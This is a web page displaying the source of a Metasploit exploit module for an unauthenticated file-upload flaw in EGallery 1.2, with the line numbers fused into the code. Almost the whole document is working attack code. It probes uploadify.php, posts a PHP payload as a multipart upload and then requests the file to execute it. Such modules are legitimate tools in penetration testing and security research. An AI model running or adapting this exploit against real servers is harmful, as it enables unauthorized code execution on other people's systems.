Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/exploits/unix/webapp/egallery_upload_exec.rb
Views: 11784
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ExcellentRanking78include Msf::Exploit::Remote::HttpClient910def initialize(info={})11super(update_info(info,12'Name' => "EGallery PHP File Upload Vulnerability",13'Description' => %q{14This module exploits a vulnerability found in EGallery 1.2 By abusing the15uploadify.php file, a malicious user can upload a file to the egallery/ directory16without any authentication, which results in arbitrary code execution. The module17has been tested successfully on Ubuntu 10.04.18},19'License' => MSF_LICENSE,20'Author' =>21[22'Sammy FORGIT', # Discovery, PoC23'juan vazquez' # Metasploit module24],25'References' =>26[27['OSVDB', '83891'],28['BID', '54464'],29['URL', 'http://www.opensyscom.fr/Actualites/egallery-arbitrary-file-upload-vulnerability.html']30],31'Payload' =>32{33'BadChars' => "\x00"34},35'DefaultOptions' =>36{37'EXITFUNC' => 'thread'38},39'Platform' => ['php'],40'Arch' => ARCH_PHP,41'Targets' =>42[43['EGallery 1.2', {}]44],45'Privileged' => false,46'DisclosureDate' => '2012-07-08',47'DefaultTarget' => 0))4849register_options(50[51OptString.new('TARGETURI', [true, 'The base path to EGallery', '/sample'])52])53end5455def check56uri = target_uri.path5758res = send_request_cgi({59'method' => 'GET',60'uri' => normalize_uri(uri, "egallery", "uploadify.php")61})6263if res and res.code == 200 and res.body.empty?64return Exploit::CheckCode::Appears65else66return Exploit::CheckCode::Safe67end68end6970def exploit71uri = normalize_uri(target_uri.path)72uri << '/' if uri[-1,1] != '/'7374peer = "#{rhost}:#{rport}"75payload_name = rand_text_alpha(rand(10) + 5) + '.php'76boundary = Rex::Text.rand_text_hex(7)7778post_data = "--#{boundary}\r\n"79post_data << "Content-Disposition: form-data; name=\"Filename\"\r\n\r\n"80post_data << "#{payload_name}\r\n"81post_data << "--#{boundary}\r\n"82post_data << "Content-Disposition: form-data; name=\"folder\"\r\n\r\n"83post_data << "#{uri}\r\n"84post_data << "--#{boundary}\r\n"85post_data << "Content-Disposition: form-data; name=\"Filedata\"; filename=\"#{payload_name}\"\r\n\r\n"86post_data << "<?php "87post_data << payload.encoded88post_data << " ?>\r\n"89post_data << "--#{boundary}--\r\n"9091print_status("Sending PHP payload (#{payload_name})")92res = send_request_cgi({93'method' => 'POST',94'uri' => normalize_uri("#{uri}egallery/uploadify.php"),95'ctype' => "multipart/form-data; boundary=#{boundary}",96'data' => post_data97})9899# If the server returns 200 and the body contains our payload name,100# we assume we uploaded the malicious file successfully101if not res or res.code != 200 or res.body !~ /#{payload_name}/102print_error("File wasn't uploaded, aborting!")103return104end105106print_status("Executing PHP payload (#{payload_name})")107# Execute our payload108res = send_request_cgi({109'method' => 'GET',110'uri' => normalize_uri("#{uri}#{payload_name}")111})112113# If we don't get a 200 when we request our malicious payload, we suspect114# we don't have a shell, either. Print the status code for debugging purposes.115if res and res.code != 200116print_status("Server returned #{res.code.to_s}")117end118end119end120121122